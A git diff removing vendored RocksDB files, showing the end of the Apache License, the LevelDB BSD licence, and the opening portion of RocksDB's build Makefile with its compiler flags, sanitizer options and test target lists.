-          distribution, then any Derivative Works that You distribute must
-          include a readable copy of the attribution notices contained
-          within such NOTICE file, excluding those notices that do not
-          pertain to any part of the Derivative Works, in at least one
-          of the following places: within a NOTICE text file distributed
-          as part of the Derivative Works; within the Source form or
-          documentation, if provided along with the Derivative Works; or,
-          within a display generated by the Derivative Works, if and
-          wherever such third-party notices normally appear. The contents
-          of the NOTICE file are for informational purposes only and
-          do not modify the License. You may add Your own attribution
-          notices within Derivative Works that You distribute, alongside
-          or as an addendum to the NOTICE text from the Work, provided
-          that such additional attribution notices cannot be construed
-          as modifying the License.
-
-      You may add Your own copyright statement to Your modifications and
-      may provide additional or different license terms and conditions
-      for use, reproduction, or distribution of Your modifications, or
-      for any such Derivative Works as a whole, provided Your use,
-      reproduction, and distribution of the Work otherwise complies with
-      the conditions stated in this License.
-
-   5. Submission of Contributions. Unless You explicitly state otherwise,
-      any Contribution intentionally submitted for inclusion in the Work
-      by You to the Licensor shall be under the terms and conditions of
-      this License, without any additional terms or conditions.
-      Notwithstanding the above, nothing herein shall supersede or modify
-      the terms of any separate license agreement you may have executed
-      with Licensor regarding such Contributions.
-
-   6. Trademarks. This License does not grant permission to use the trade
-      names, trademarks, service marks, or product names of the Licensor,
-      except as required for reasonable and customary use in describing the
-      origin of the Work and reproducing the content of the NOTICE file.
-
-   7. Disclaimer of Warranty. Unless required by applicable law or
-      agreed to in writing, Licensor provides the Work (and each
-      Contributor provides its Contributions) on an "AS IS" BASIS,
-      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
-      implied, including, without limitation, any warranties or conditions
-      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
-      PARTICULAR PURPOSE. You are solely responsible for determining the
-      appropriateness of using or redistributing the Work and assume any
-      risks associated with Your exercise of permissions under this License.
-
-   8. Limitation of Liability. In no event and under no legal theory,
-      whether in tort (including negligence), contract, or otherwise,
-      unless required by applicable law (such as deliberate and grossly
-      negligent acts) or agreed to in writing, shall any Contributor be
-      liable to You for damages, including any direct, indirect, special,
-      incidental, or consequential damages of any character arising as a
-      result of this License or out of the use or inability to use the
-      Work (including but not limited to damages for loss of goodwill,
-      work stoppage, computer failure or malfunction, or any and all
-      other commercial damages or losses), even if such Contributor
-      has been advised of the possibility of such damages.
-
-   9. Accepting Warranty or Additional Liability. While redistributing
-      the Work or Derivative Works thereof, You may choose to offer,
-      and charge a fee for, acceptance of support, warranty, indemnity,
-      or other liability obligations and/or rights consistent with this
-      License. However, in accepting such obligations, You may act only
-      on Your own behalf and on Your sole responsibility, not on behalf
-      of any other Contributor, and only if You agree to indemnify,
-      defend, and hold each Contributor harmless for any liability
-      incurred by, or claims asserted against, such Contributor by reason
-      of your accepting any such warranty or additional liability.
-
-   END OF TERMS AND CONDITIONS
-
-   APPENDIX: How to apply the Apache License to your work.
-
-      To apply the Apache License to your work, attach the following
-      boilerplate notice, with the fields enclosed by brackets "[]"
-      replaced with your own identifying information. (Don't include
-      the brackets!)  The text should be enclosed in the appropriate
-      comment syntax for the file format. We also recommend that a
-      file or class name and description of purpose be included on the
-      same "printed page" as the copyright notice for easier
-      identification within third-party archives.
-
-   Copyright [yyyy] [name of copyright owner]
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
diff --git a/thirdparty/rocksdb/LICENSE.leveldb b/thirdparty/rocksdb/LICENSE.leveldb
deleted file mode 100644
index 7108b0b..0000000
--- a/thirdparty/rocksdb/LICENSE.leveldb
+++ /dev/null
@@ -1,29 +0,0 @@
-This contains code that is from LevelDB, and that code is under the following license:
-
-Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-   * Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
-   * Redistributions in binary form must reproduce the above
-copyright notice, this list of conditions and the following disclaimer
-in the documentation and/or other materials provided with the
-distribution.
-   * Neither the name of Google Inc. nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/thirdparty/rocksdb/Makefile b/thirdparty/rocksdb/Makefile
deleted file mode 100644
index 5a89f6b..0000000
--- a/thirdparty/rocksdb/Makefile
+++ /dev/null
@@ -1,1769 +0,0 @@
-# Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-# Use of this source code is governed by a BSD-style license that can be
-# found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-# Inherit some settings from environment variables, if available
-
-#-----------------------------------------------
-
-BASH_EXISTS := $(shell which bash)
-SHELL := $(shell which bash)
-
-CLEAN_FILES = # deliberately empty, so we can append below.
-CFLAGS += ${EXTRA_CFLAGS}
-CXXFLAGS += ${EXTRA_CXXFLAGS}
-LDFLAGS += $(EXTRA_LDFLAGS)
-MACHINE ?= $(shell uname -m)
-ARFLAGS = ${EXTRA_ARFLAGS} rs
-STRIPFLAGS = -S -x
-
-# Transform parallel LOG output into something more readable.
-perl_command = perl -n \
-  -e '@a=split("\t",$$_,-1); $$t=$$a[8];'				\
-  -e '$$t =~ /.*if\s\[\[\s"(.*?\.[\w\/]+)/ and $$t=$$1;'		\
-  -e '$$t =~ s,^\./,,;'							\
-  -e '$$t =~ s, >.*,,; chomp $$t;'					\
-  -e '$$t =~ /.*--gtest_filter=(.*?\.[\w\/]+)/ and $$t=$$1;'		\
-  -e 'printf "%7.3f %s %s\n", $$a[3], $$a[6] == 0 ? "PASS" : "FAIL", $$t'
-quoted_perl_command = $(subst ','\'',$(perl_command))
-
-# DEBUG_LEVEL can have three values:
-# * DEBUG_LEVEL=2; this is the ultimate debug mode. It will compile rocksdb
-# without any optimizations. To compile with level 2, issue `make dbg`
-# * DEBUG_LEVEL=1; debug level 1 enables all assertions and debug code, but
-# compiles rocksdb with -O2 optimizations. this is the default debug level.
-# `make all` or `make <binary_target>` compile RocksDB with debug level 1.
-# We use this debug level when developing RocksDB.
-# * DEBUG_LEVEL=0; this is the debug level we use for release. If you're
-# running rocksdb in production you most definitely want to compile RocksDB
-# with debug level 0. To compile with level 0, run `make shared_lib`,
-# `make install-shared`, `make static_lib`, `make install-static` or
-# `make install`
-
-# Set the default DEBUG_LEVEL to 1
-DEBUG_LEVEL?=1
-
-ifeq ($(MAKECMDGOALS),dbg)
-	DEBUG_LEVEL=2
-endif
-
-ifeq ($(MAKECMDGOALS),clean)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),release)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),shared_lib)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),install-shared)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),static_lib)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),install-static)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),install)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),rocksdbjavastatic)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),rocksdbjavastaticrelease)
-	DEBUG_LEVEL=0
-endif
-
-ifeq ($(MAKECMDGOALS),rocksdbjavastaticpublish)
-	DEBUG_LEVEL=0
-endif
-
-# compile with -O2 if debug level is not 2
-ifneq ($(DEBUG_LEVEL), 2)
-OPT += -O2 -fno-omit-frame-pointer
-# Skip for archs that don't support -momit-leaf-frame-pointer
-ifeq (,$(shell $(CXX) -fsyntax-only -momit-leaf-frame-pointer -xc /dev/null 2>&1))
-OPT += -momit-leaf-frame-pointer
-endif
-endif
-
-# if we're compiling for release, compile without debug code (-DNDEBUG) and
-# don't treat warnings as errors
-ifeq ($(DEBUG_LEVEL),0)
-OPT += -DNDEBUG
-DISABLE_WARNING_AS_ERROR=1
-
-ifneq ($(USE_RTTI), 1)
-	CXXFLAGS += -fno-rtti
-else
-	CXXFLAGS += -DROCKSDB_USE_RTTI
-endif
-else
-ifneq ($(USE_RTTI), 0)
-	CXXFLAGS += -DROCKSDB_USE_RTTI
-else
-	CXXFLAGS += -fno-rtti
-endif
-
-$(warning Warning: Compiling in debug mode. Don't use the resulting binary in production)
-endif
-
-#-----------------------------------------------
-include src.mk
-
-AM_DEFAULT_VERBOSITY = 0
-
-AM_V_GEN = $(am__v_GEN_$(V))
-am__v_GEN_ = $(am__v_GEN_$(AM_DEFAULT_VERBOSITY))
-am__v_GEN_0 = @echo "  GEN     " $@;
-am__v_GEN_1 =
-AM_V_at = $(am__v_at_$(V))
-am__v_at_ = $(am__v_at_$(AM_DEFAULT_VERBOSITY))
-am__v_at_0 = @
-am__v_at_1 =
-
-AM_V_CC = $(am__v_CC_$(V))
-am__v_CC_ = $(am__v_CC_$(AM_DEFAULT_VERBOSITY))
-am__v_CC_0 = @echo "  CC      " $@;
-am__v_CC_1 =
-CCLD = $(CC)
-LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@
-AM_V_CCLD = $(am__v_CCLD_$(V))
-am__v_CCLD_ = $(am__v_CCLD_$(AM_DEFAULT_VERBOSITY))
-am__v_CCLD_0 = @echo "  CCLD    " $@;
-am__v_CCLD_1 =
-AM_V_AR = $(am__v_AR_$(V))
-am__v_AR_ = $(am__v_AR_$(AM_DEFAULT_VERBOSITY))
-am__v_AR_0 = @echo "  AR      " $@;
-am__v_AR_1 =
-
-ifdef ROCKSDB_USE_LIBRADOS
-LIB_SOURCES += utilities/env_librados.cc
-LDFLAGS += -lrados
-endif
-
-AM_LINK = $(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS) $(COVERAGEFLAGS)
-# detect what platform we're building on
-dummy := $(shell (export ROCKSDB_ROOT="$(CURDIR)"; export PORTABLE="$(PORTABLE)"; "$(CURDIR)/build_tools/build_detect_platform" "$(CURDIR)/make_config.mk"))
-# this file is generated by the previous line to set build flags and sources
-include make_config.mk
-CLEAN_FILES += make_config.mk
-
-missing_make_config_paths := $(shell				\
-	grep "\/\S*" -o $(CURDIR)/make_config.mk | 		\
-	while read path;					\
-		do [ -e $$path ] || echo $$path; 		\
-	done | sort | uniq)
-
-$(foreach path, $(missing_make_config_paths), \
-	$(warning Warning: $(path) dont exist))
-
-ifeq ($(PLATFORM), OS_AIX)
-# no debug info
-else ifneq ($(PLATFORM), IOS)
-CFLAGS += -g
-CXXFLAGS += -g
-else
-# no debug info for IOS, that will make our library big
-OPT += -DNDEBUG
-endif
-
-ifeq ($(PLATFORM), OS_AIX)
-ARFLAGS = -X64 rs
-STRIPFLAGS = -X64 -x
-endif
-
-ifeq ($(PLATFORM), OS_SOLARIS)
-	PLATFORM_CXXFLAGS += -D _GLIBCXX_USE_C99
-endif
-ifneq ($(filter -DROCKSDB_LITE,$(OPT)),)
-	# found
-	CFLAGS += -fno-exceptions
-	CXXFLAGS += -fno-exceptions
-	# LUA is not supported under ROCKSDB_LITE
-	LUA_PATH =
-endif
-
-# ASAN doesn't work well with jemalloc. If we're compiling with ASAN, we should use regular malloc.
-ifdef COMPILE_WITH_ASAN
-	DISABLE_JEMALLOC=1
-	EXEC_LDFLAGS += -fsanitize=address
-	PLATFORM_CCFLAGS += -fsanitize=address
-	PLATFORM_CXXFLAGS += -fsanitize=address
-endif
-
-# TSAN doesn't work well with jemalloc. If we're compiling with TSAN, we should use regular malloc.
-ifdef COMPILE_WITH_TSAN
-	DISABLE_JEMALLOC=1
-	EXEC_LDFLAGS += -fsanitize=thread
-	PLATFORM_CCFLAGS += -fsanitize=thread -fPIC
-	PLATFORM_CXXFLAGS += -fsanitize=thread -fPIC
-        # Turn off -pg when enabling TSAN testing, because that induces
-        # a link failure.  TODO: find the root cause
-	PROFILING_FLAGS =
-	# LUA is not supported under TSAN
-	LUA_PATH =
-endif
-
-# AIX doesn't work with -pg
-ifeq ($(PLATFORM), OS_AIX)
-	PROFILING_FLAGS =
-endif
-
-# USAN doesn't work well with jemalloc. If we're compiling with USAN, we should use regular malloc.
-ifdef COMPILE_WITH_UBSAN
-	DISABLE_JEMALLOC=1
-	EXEC_LDFLAGS += -fsanitize=undefined
-	PLATFORM_CCFLAGS += -fsanitize=undefined -DROCKSDB_UBSAN_RUN
-	PLATFORM_CXXFLAGS += -fsanitize=undefined -DROCKSDB_UBSAN_RUN
-endif
-
-ifndef DISABLE_JEMALLOC
-	ifdef JEMALLOC
-		PLATFORM_CXXFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE
-		PLATFORM_CCFLAGS  += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE
-	endif
-	ifdef WITH_JEMALLOC_FLAG
-		PLATFORM_LDFLAGS += -ljemalloc
-		JAVA_LDFLAGS += -ljemalloc
-	endif
-	EXEC_LDFLAGS := $(JEMALLOC_LIB) $(EXEC_LDFLAGS)
-	PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE)
-	PLATFORM_CCFLAGS += $(JEMALLOC_INCLUDE)
-endif
-
-export GTEST_THROW_ON_FAILURE=1
-export GTEST_HAS_EXCEPTIONS=1
-GTEST_DIR = ./third-party/gtest-1.7.0/fused-src
-# AIX: pre-defined system headers are surrounded by an extern "C" block
-ifeq ($(PLATFORM), OS_AIX)
-	PLATFORM_CCFLAGS += -I$(GTEST_DIR)
-	PLATFORM_CXXFLAGS += -I$(GTEST_DIR)
-else
-	PLATFORM_CCFLAGS += -isystem $(GTEST_DIR)
-	PLATFORM_CXXFLAGS += -isystem $(GTEST_DIR)
-endif
-
-# This (the first rule) must depend on "all".
-default: all
-
-WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \
-  -Wno-unused-parameter
-
-ifndef DISABLE_WARNING_AS_ERROR
-	WARNING_FLAGS += -Werror
-endif
-
-
-ifdef LUA_PATH
-
-ifndef LUA_INCLUDE
-LUA_INCLUDE=$(LUA_PATH)/include
-endif
-
-LUA_INCLUDE_FILE=$(LUA_INCLUDE)/lualib.h
-
-ifeq ("$(wildcard $(LUA_INCLUDE_FILE))", "")
-# LUA_INCLUDE_FILE does not exist
-$(error Cannot find lualib.h under $(LUA_INCLUDE).  Try to specify both LUA_PATH and LUA_INCLUDE manually)
-endif
-LUA_FLAGS = -I$(LUA_INCLUDE) -DLUA -DLUA_COMPAT_ALL
-CFLAGS += $(LUA_FLAGS)
-CXXFLAGS += $(LUA_FLAGS)
-
-ifndef LUA_LIB
-LUA_LIB = $(LUA_PATH)/lib/liblua.a
-endif
-ifeq ("$(wildcard $(LUA_LIB))", "") # LUA_LIB does not exist
-$(error $(LUA_LIB) does not exist.  Try to specify both LUA_PATH and LUA_LIB manually)
-endif
-LDFLAGS += $(LUA_LIB)
-
-endif
-
-
-CFLAGS += $(WARNING_FLAGS) -I. -I./include $(PLATFORM_CCFLAGS) $(OPT)
-CXXFLAGS += $(WARNING_FLAGS) -I. -I./include $(PLATFORM_CXXFLAGS) $(OPT) -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers
-
-LDFLAGS += $(PLATFORM_LDFLAGS)
-
-# If NO_UPDATE_BUILD_VERSION is set we don't update util/build_version.cc, but
-# the file needs to already exist or else the build will fail
-ifndef NO_UPDATE_BUILD_VERSION
-date := $(shell date +%F)
-ifdef FORCE_GIT_SHA
-	git_sha := $(FORCE_GIT_SHA)
-else
-	git_sha := $(shell git rev-parse HEAD 2>/dev/null)
-endif
-gen_build_version = sed -e s/@@GIT_SHA@@/$(git_sha)/ -e s/@@GIT_DATE_TIME@@/$(date)/ util/build_version.cc.in
-
-# Record the version of the source that we are compiling.
-# We keep a record of the git revision in this file.  It is then built
-# as a regular source file as part of the compilation process.
-# One can run "strings executable_filename | grep _build_" to find
-# the version of the source that we used to build the executable file.
-FORCE:
-util/build_version.cc: FORCE
-	$(AM_V_GEN)rm -f $@-t
-	$(AM_V_at)$(gen_build_version) > $@-t
-	$(AM_V_at)if test -f $@; then					\
-	  cmp -s $@-t $@ && rm -f $@-t || mv -f $@-t $@;		\
-	else mv -f $@-t $@; fi
-endif
-
-LIBOBJECTS = $(LIB_SOURCES:.cc=.o)
-LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.o)
-MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.o)
-
-GTEST = $(GTEST_DIR)/gtest/gtest-all.o
-TESTUTIL = ./util/testutil.o
-TESTHARNESS = ./util/testharness.o $(TESTUTIL) $(MOCKOBJECTS) $(GTEST)
-VALGRIND_ERROR = 2
-VALGRIND_VER := $(join $(VALGRIND_VER),valgrind)
-
-VALGRIND_OPTS = --error-exitcode=$(VALGRIND_ERROR) --leak-check=full
-
-BENCHTOOLOBJECTS = $(BENCH_LIB_SOURCES:.cc=.o) $(LIBOBJECTS) $(TESTUTIL)
-
-EXPOBJECTS = $(EXP_LIB_SOURCES:.cc=.o) $(LIBOBJECTS) $(TESTUTIL)
-
-TESTS = \
-	db_basic_test \
-	db_encryption_test \
-	db_test2 \
-	external_sst_file_basic_test \
-	auto_roll_logger_test \
-	bloom_test \
-	dynamic_bloom_test \
-	c_test \
-	checkpoint_test \
-	crc32c_test \
-	coding_test \
-	inlineskiplist_test \
-	env_basic_test \
-	env_test \
-	hash_test \
-	thread_local_test \
-	rate_limiter_test \
-	perf_context_test \
-	iostats_context_test \
-	db_wal_test \
-	db_block_cache_test \
-	db_test \
-	db_blob_index_test \
-	db_bloom_filter_test \
-	db_iter_test \
-	db_log_iter_test \
-	db_compaction_filter_test \
-	db_compaction_test \
-	db_dynamic_level_test \
-	db_flush_test \
-	db_inplace_update_test \
-	db_iterator_test \
-	db_memtable_test \
-	db_merge_operator_test \
-	db_options_test \
-	db_range_del_test \
-	db_sst_test \
-	db_tailing_iter_test \
-	db_universal_compaction_test \
-	db_io_failure_test \
-	db_properties_test \
-	db_table_properties_test \
-	db_statistics_test \
-	db_write_test \
-	autovector_test \
-	blob_db_test \
-	cleanable_test \
-	column_family_test \
-	table_properties_collector_test \
-	arena_test \
-	block_test \
-	cache_test \
-	corruption_test \
-	slice_transform_test \
-	dbformat_test \
-	fault_injection_test \
-	filelock_test \
-	filename_test \
-	file_reader_writer_test \
-	block_based_filter_block_test \
-	full_filter_block_test \
-	partitioned_filter_block_test \
-	hash_table_test \
-	histogram_test \
-	log_test \
-	manual_compaction_test \
-	mock_env_test \
-	memtable_list_test \
-	merge_helper_test \
-	memory_test \
-	merge_test \
-	merger_test \
-	util_merge_operators_test \
-	options_file_test \
-	redis_test \
-	reduce_levels_test \
-	plain_table_db_test \
-	comparator_db_test \
-	external_sst_file_test \
-	prefix_test \
-	skiplist_test \
-	write_buffer_manager_test \
-	stringappend_test \
-	cassandra_format_test \
-	cassandra_functional_test \
-	cassandra_row_merge_test \
-	cassandra_serialize_test \
-	ttl_test \
-	date_tiered_test \
-	backupable_db_test \
-	document_db_test \
-	json_document_test \
-	sim_cache_test \
-	spatial_db_test \
-	version_edit_test \
-	version_set_test \
-	compaction_picker_test \
-	version_builder_test \
-	file_indexer_test \
-	write_batch_test \
-	write_batch_with_index_test \
-	write_controller_test\
-	deletefile_test \
-	table_test \
-	geodb_test \
-	delete_scheduler_test \
-	options_test \
-	options_settable_test \
-	options_util_test \
-	event_logger_test \
-	timer_queue_test \
-	cuckoo_table_builder_test \
-	cuckoo_table_reader_test \
-	cuckoo_table_db_test \
-	flush_job_test \
-	wal_manager_test \
-	listener_test \
-	compaction_iterator_test \
-	compaction_job_test \
-	thread_list_test \
-	sst_dump_test \
-	column_aware_encoding_test \
-	compact_files_test \
-	optimistic_transaction_test \
-	write_callback_test \
-	heap_test \
-	compact_on_deletion_collector_test \
-	compaction_job_stats_test \
-	option_change_migration_test \
-	transaction_test \
-	ldb_cmd_test \
-	persistent_cache_test \
-	statistics_test \
-	lua_test \
-	range_del_aggregator_test \
-	lru_cache_test \
-	object_registry_test \
-	repair_test \
-	env_timed_test \
-
-PARALLEL_TEST = \
-	backupable_db_test \
-	db_compaction_filter_test \
-	db_compaction_test \
-	db_sst_test \
-	db_test \
-	db_universal_compaction_test \
-	db_wal_test \
-	external_sst_file_test \
-	fault_injection_test \
-	inlineskiplist_test \
-	manual_compaction_test \
-	persistent_cache_test \
-	table_test \
-	transaction_test
-
-SUBSET := $(TESTS)
-ifdef ROCKSDBTESTS_START
-        SUBSET := $(shell echo $(SUBSET) | sed 's/^.*$(ROCKSDBTESTS_START)/$(ROCKSDBTESTS_START)/')
-endif
-
-ifdef ROCKSDBTESTS_END
-        SUBSET := $(shell echo $(SUBSET) | sed 's/$(ROCKSDBTESTS_END).*//')
-endif
-
-TOOLS = \
-	sst_dump \
-	db_sanity_test \
-	db_stress \
-	write_stress \
-	ldb \
-	db_repl_stress \
-	rocksdb_dump \
-	rocksdb_undump \
-	blob_dump \
-
-TEST_LIBS = \
-	librocksdb_env_basic_test.a
-
-# TODO: add back forward_iterator_bench, after making it build in all environemnts.
-BENCHMARKS = db_bench table_reader_bench cache_bench memtablerep_bench column_aware_encoding_exp persistent_cache_bench
-
-# if user didn't config LIBNAME, set the default
-ifeq ($(LIBNAME),)
-# we should only run rocksdb in production with DEBUG_LEVEL 0
-ifeq ($(DEBUG_LEVEL),0)
-        LIBNAME=librocksdb
-else
-        LIBNAME=librocksdb_debug
-endif
-endif
-LIBRARY = ${LIBNAME}.a
-TOOLS_LIBRARY = ${LIBNAME}_tools.a
-
-ROCKSDB_MAJOR = $(shell egrep "ROCKSDB_MAJOR.[0-9]" include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_MINOR = $(shell egrep "ROCKSDB_MINOR.[0-9]" include/rocksdb/version.h | cut -d ' ' -f 3)
-ROCKSDB_PATCH = $(shell egrep "ROCKSDB_PATCH.[0-9]" include/rocksdb/version.h | cut -d ' ' -f 3)
-
-default: all
-
-#-----------------------------------------------
-# Create platform independent shared libraries.
-#-----------------------------------------------
-ifneq ($(PLATFORM_SHARED_EXT),)
-
-ifneq ($(PLATFORM_SHARED_VERSIONED),true)
-SHARED1 = ${LIBNAME}.$(PLATFORM_SHARED_EXT)
-SHARED2 = $(SHARED1)
-SHARED3 = $(SHARED1)
-SHARED4 = $(SHARED1)
-SHARED = $(SHARED1)
-else
-SHARED_MAJOR = $(ROCKSDB_MAJOR)
-SHARED_MINOR = $(ROCKSDB_MINOR)
-SHARED_PATCH = $(ROCKSDB_PATCH)
-SHARED1 = ${LIBNAME}.$(PLATFORM_SHARED_EXT)
-ifeq ($(PLATFORM), OS_MACOSX)
-SHARED_OSX = $(LIBNAME).$(SHARED_MAJOR)
-SHARED2 = $(SHARED_OSX).$(PLATFORM_SHARED_EXT)
-SHARED3 = $(SHARED_OSX).$(SHARED_MINOR).$(PLATFORM_SHARED_EXT)
-SHARED4 = $(SHARED_OSX).$(SHARED_MINOR).$(SHARED_PATCH).$(PLATFORM_SHARED_EXT)
-else
-SHARED2 = $(SHARED1).$(SHARED_MAJOR)
-SHARED3 = $(SHARED1).$(SHARED_MAJOR).$(SHARED_MINOR)
-SHARED4 = $(SHARED1).$(SHARED_MAJOR).$(SHARED_MINOR).$(SHARED_PATCH)
-endif
-SHARED = $(SHARED1) $(SHARED2) $(SHARED3) $(SHARED4)
-$(SHARED1): $(SHARED4)
-	ln -fs $(SHARED4) $(SHARED1)
-$(SHARED2): $(SHARED4)
-	ln -fs $(SHARED4) $(SHARED2)
-$(SHARED3): $(SHARED4)
-	ln -fs $(SHARED4) $(SHARED3)
-endif
-
-shared_libobjects = $(patsubst %,shared-objects/%,$(LIBOBJECTS))
-CLEAN_FILES += shared-objects
-
-$(shared_libobjects): shared-objects/%.o: %.cc
-	$(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@
-
-$(SHARED4): $(shared_libobjects)
-	$(CXX) $(PLATFORM_SHARED_LDFLAGS)$(SHARED3) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) $(shared_libobjects) $(LDFLAGS) -o $@
-
-endif  # PLATFORM_SHARED_EXT
-
-.PHONY: blackbox_crash_test check clean coverage crash_test ldb_tests package \
-	release tags valgrind_check whitebox_crash_test format static_lib shared_lib all \
-	dbg rocksdbjavastatic rocksdbjava install install-static install-shared uninstall \
-	analyze tools tools_lib
-
-
-all: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(TESTS)
-
-all_but_some_tests: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(SUBSET)
-
-static_lib: $(LIBRARY)
-
-shared_lib: $(SHARED)
-
-tools: $(TOOLS)
-
-tools_lib: $(TOOLS_LIBRARY)
-
-test_libs: $(TEST_LIBS)
-
-dbg: $(LIBRARY) $(BENCHMARKS) tools $(TESTS)
-
-# creates static library and programs
-release:
-	$(MAKE) clean
-	DEBUG_LEVEL=0 $(MAKE) static_lib tools db_bench
-
-coverage:
-	$(MAKE) clean
-	COVERAGEFLAGS="-fprofile-arcs -ftest-coverage" LDFLAGS+="-lgcov" $(MAKE) J=1 all check
-	cd coverage && ./coverage_test.sh
-        # Delete intermediate files
-	find . -type f -regex ".*\.\(\(gcda\)\|\(gcno\)\)" -exec rm {} \;
-
-ifneq (,$(filter check parallel_check,$(MAKECMDGOALS)),)
-# Use /dev/shm if it has the sticky bit set (otherwise, /tmp),
-# and create a randomly-named rocksdb.XXXX directory therein.
-# We'll use that directory in the "make check" rules.
-ifeq ($(TMPD),)
-TMPDIR := $(shell echo $${TMPDIR:-/tmp})
-TMPD := $(shell f=/dev/shm; test -k $$f || f=$(TMPDIR);     \
-  perl -le 'use File::Temp "tempdir";'					\
-    -e 'print tempdir("'$$f'/rocksdb.XXXX", CLEANUP => 0)')
-endif
-endif
-
-# Run all tests in parallel, accumulating per-test logs in t/log-*.
-#
-# Each t/run-* file is a tiny generated bourne shell script that invokes one of
-# sub-tests. Why use a file for this?  Because that makes the invocation of
-# parallel below simpler, which in turn makes the parsing of parallel's
-# LOG simpler (the latter is for live monitoring as parallel
-# tests run).
-#
-# Test names are extracted by running tests with --gtest_list_tests.
-# This filter removes the "#"-introduced comments, and expands to
-# fully-qualified names by changing input like this:
-#
-#   DBTest.
-#     Empty
-#     WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.
-#     MultiThreaded/0  # GetParam() = 0
-#     MultiThreaded/1  # GetParam() = 1
-#
-# into this:
-#
-#   DBTest.Empty
-#   DBTest.WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/0
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/1
-#
-
-parallel_tests = $(patsubst %,parallel_%,$(PARALLEL_TEST))
-.PHONY: gen_parallel_tests $(parallel_tests)
-$(parallel_tests): $(PARALLEL_TEST)
-	$(AM_V_at)TEST_BINARY=$(patsubst parallel_%,%,$@); \
-  TEST_NAMES=` \
-    ./$$TEST_BINARY --gtest_list_tests \
-    | perl -n \
-      -e 's/ *\#.*//;' \
-      -e '/^(\s*)(\S+)/; !$$1 and do {$$p=$$2; break};'	\
-      -e 'print qq! $$p$$2!'`; \
-	for TEST_NAME in $$TEST_NAMES; do \
-		TEST_SCRIPT=t/run-$$TEST_BINARY-$${TEST_NAME//\//-}; \
-		echo "  GEN     " $$TEST_SCRIPT; \
-    printf '%s\n' \
-      '#!/bin/sh' \
-      "d=\$(TMPD)$$TEST_SCRIPT" \
-      'mkdir -p $$d' \
-      "TEST_TMPDIR=\$$d $(DRIVER) ./$$TEST_BINARY --gtest_filter=$$TEST_NAME" \
-		> $$TEST_SCRIPT; \
-		chmod a=rx $$TEST_SCRIPT; \
-	done
-
-gen_parallel_tests:
-	$(AM_V_at)mkdir -p t
-	$(AM_V_at)rm -f t/run-*
-	$(MAKE) $(parallel_tests)
-
-# Reorder input lines (which are one per test) so that the
-# longest-running tests appear first in the output.
-# Do this by prefixing each selected name with its duration,
-# sort the resulting names, and remove the leading numbers.
-# FIXME: the "100" we prepend is a fake time, for now.
-# FIXME: squirrel away timings from each run and use them
-# (when present) on subsequent runs to order these tests.
-#
-# Without this reordering, these two tests would happen to start only
-# after almost all other tests had completed, thus adding 100 seconds
-# to the duration of parallel "make check".  That's the difference
-# between 4 minutes (old) and 2m20s (new).
-#
